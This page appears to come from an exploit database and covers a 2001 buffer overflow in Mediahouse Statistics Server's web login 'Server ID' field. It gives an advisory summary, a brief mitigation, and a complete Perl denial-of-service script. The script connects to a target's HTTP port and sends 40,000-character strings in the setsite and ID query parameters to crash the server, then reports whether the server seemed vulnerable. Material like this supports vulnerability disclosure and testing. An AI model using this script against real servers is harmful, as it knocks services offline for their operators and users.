header-logo
Suggest Exploit
vendor:
Statistics Server
by:
Per Bergehed
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Statistics Server
Affected Version From: 4.28
Affected Version To: 05.01
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows NT 4.0
2001

Mediahouse Statistics Server Buffer Overflow

The web interface for Statistics Server contains an unchecked buffer which accepts input from the "Server ID" field of the login webpage. While the login webpage has a 16 character restriction, this is easily circumventible by editing the HTML to remove the restriction. Entering a string of more than 3773 characters will crash the server. This bug could potentially be used to remotely execute arbitrary code.

Mitigation:

Ensure that input is properly validated and sanitized before being used.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/734/info

The web interface for Statistics Server contains an unchecked buffer which accepts input from the "Server ID" field of the login webpage. While the login webpage has a 16 character restriction, this is easily circumventible by editing the HTML to remove the restriction. Entering a string of more than 3773 characters will crash the server. This bug could potentially be used to remotely execute arbitrary code. 

#!/usr/bin/perl

###############################################################
# Sample DoS against the Mediahouse Statistics Server
# This was tested against 4.28 & 5.01 running on Windows NT 4.0
#
# Only use it to determine if your own Server is vulnerable!
#
# Per Bergehed (per_bergehed@hotmail.com)
#
# http://w1.855.telia.com/~u85513179/security/exploits/mediahouse.html
#
# V1.0 - Check for "ss?form=statsredir&ID=..." buffer overflow.
# V1.1 - added check for "ss?form=setsite&ID=..." buffer overflow.
#

use IO::Socket;

print "############################################################\n";
print "# Simple DoS-attack against the Mediahouse Statistics Server\n";
print "# Tested with version 4.28 & 5.01\n";
print "\n";

if ($#ARGV != 0) 
{
        die "-> Please give the host address as argument.\n"
}

opensocket ("\n");
print $remote "GET " . "ss?setsite=" . "A" x 40000 . "& HTTP/1.0\n\n";
print $remote "GET " . "ss?form=statsredir&ID=" . "A" x 40000 . "& HTTP/1.0\n\n";
close $remote;

opensocket ("\n-> The server seemed to be vulnerable to this attack\n");
close $remote;
die "-> The server does not seem to be vulnerable to this attack\n";

sub opensocket 
{
        $remote = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $ARGV[0],
                PeerPort => "http(80)",
        ) || die "# Can't open http-port on $ARGV[0]$_[0]";
        $remote->autoflush(1)
}

# EOF